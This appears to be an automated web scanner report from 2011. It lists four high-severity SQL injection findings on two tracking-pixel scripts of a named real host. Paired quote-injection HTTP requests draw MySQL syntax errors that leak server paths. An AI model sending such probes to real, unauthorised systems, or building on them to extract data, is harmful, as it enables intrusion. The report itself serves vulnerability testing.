1.1. http://link.mavnt.com/1x1.php [51270 parameter]
1.2. http://link.mavnt.com/1x1.php [name of an arbitrarily supplied request parameter]
1.3. http://link.mavnt.com/1x1_map.php [51270 parameter]
1.4. http://link.mavnt.com/1x1_map.php [name of an arbitrarily supplied request parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://link.mavnt.com |
Path: | /1x1.php |
GET /1x1.php?51270' HTTP/1.1 Host: link.mavnt.com Proxy-Connection: keep-alive Referer: http://www.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:45 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 682 Content-Type: text/html <br /> <b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''51270''' at line 1' in /var/data/adventv2/htdocs Stack trace: #0 ...[SNIP]... |
GET /1x1.php?51270'' HTTP/1.1 Host: link.mavnt.com Proxy-Connection: keep-alive Referer: http://www.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:48 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 49 Content-Type: image/gif GIF89a................... |
Severity: | High |
Confidence: | Certain |
Host: | http://link.mavnt.com |
Path: | /1x1.php |
GET /1x1.php?1'=1 HTTP/1.1 Host: link.mavnt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:20 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 675 Connection: close Content-Type: text/html <br /> <b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1' in /var/data/adventv2/htdocs Stack trace: #0 /var/d ...[SNIP]... |
GET /1x1.php?1''=1 HTTP/1.1 Host: link.mavnt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:20 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 49 Connection: close Content-Type: image/gif GIF89a................... |
Severity: | High |
Confidence: | Certain |
Host: | http://link.mavnt.com |
Path: | /1x1_map.php |
GET /1x1_map.php?51270' HTTP/1.1 Host: link.mavnt.com Proxy-Connection: keep-alive Referer: http://www.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:37 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 682 Content-Type: text/html <br /> <b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''51270''' at line 1' in /var/data/adventv2/htdocs Stack trace: #0 ...[SNIP]... |
GET /1x1_map.php?51270'' HTTP/1.1 Host: link.mavnt.com Proxy-Connection: keep-alive Referer: http://www.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:39 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 49 Content-Type: image/gif GIF89a................... |
Severity: | High |
Confidence: | Certain |
Host: | http://link.mavnt.com |
Path: | /1x1_map.php |
GET /1x1_map.php?1'=1 HTTP/1.1 Host: link.mavnt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:23 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 675 Connection: close Content-Type: text/html <br /> <b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1' in /var/data/adventv2/htdocs Stack trace: #0 /var/d ...[SNIP]... |
GET /1x1_map.php?1''=1 HTTP/1.1 Host: link.mavnt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:23 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 49 Connection: close Content-Type: image/gif GIF89a................... |